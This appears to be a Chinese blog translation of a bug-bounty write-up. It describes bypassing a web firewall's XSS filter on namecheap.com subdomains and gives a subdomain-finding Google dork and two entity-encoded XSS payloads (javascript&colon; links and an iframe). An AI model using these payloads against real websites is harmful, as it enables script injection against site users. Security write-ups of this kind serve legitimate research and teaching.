第八篇翻译:绕过XSS防护

原文:The story behined the Strong XSS filter bypass!

漏洞:编码绕过XSS防火墙

作者:Yeasir Arafat

难度:中

  今天的主题是关于如何绕过XSS过滤。我已经观察目标网站很久了,并且一直在尝试利用谷歌语法试图发现网站的子域名,大家也可以尝试一下。好不容易找到几个子域,正当我尝试XSS注入的时候,却被防火墙各种蹂躏

1
site:*.*.namecheap.com & site:*.namecheap.com

  虽然痛不欲生,但我是那种会放弃的人吗?经过多方面的尝试之后,终于发现了一种莫名其妙的编码方式能够绕过防火墙

1
2
<a href="javascript&colon;alert&lpar;document&period;domain&rpar;">Click Here</a>
"><iframe/src=javascript&colon;[document&period;domain].find(alert(1))>

视屏

[*]xss-1

[*]xss-2

打赏译者

本文标题:第八篇翻译:绕过XSS防护

文章作者:TimeS0ng

发布时间:2018-12-23, 15:50:57

最后更新:2019-03-08, 17:46:04

原始链接:http://TimeS0ng.github.io/2018/12/23/第八篇翻译:绕过XSS防护/

许可协议: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

文章目录
  1. 1. 原文:The story behined the Strong XSS filter bypass!
  2. 2. 漏洞:编码绕过XSS防火墙
  3. 3. 作者:Yeasir Arafat
  4. 4. 难度:中
  5. 5.   今天的主题是关于如何绕过XSS过滤。我已经观察目标网站很久了,并且一直在尝试利用谷歌语法试图发现网站的子域名,大家也可以尝试一下。好不容易找到几个子域,正当我尝试XSS注入的时候,却被防火墙各种蹂躏
  6. 6.   虽然痛不欲生,但我是那种会放弃的人吗?经过多方面的尝试之后,终于发现了一种莫名其妙的编码方式能够绕过防火墙
  • 视屏
  • 打赏译者
    • |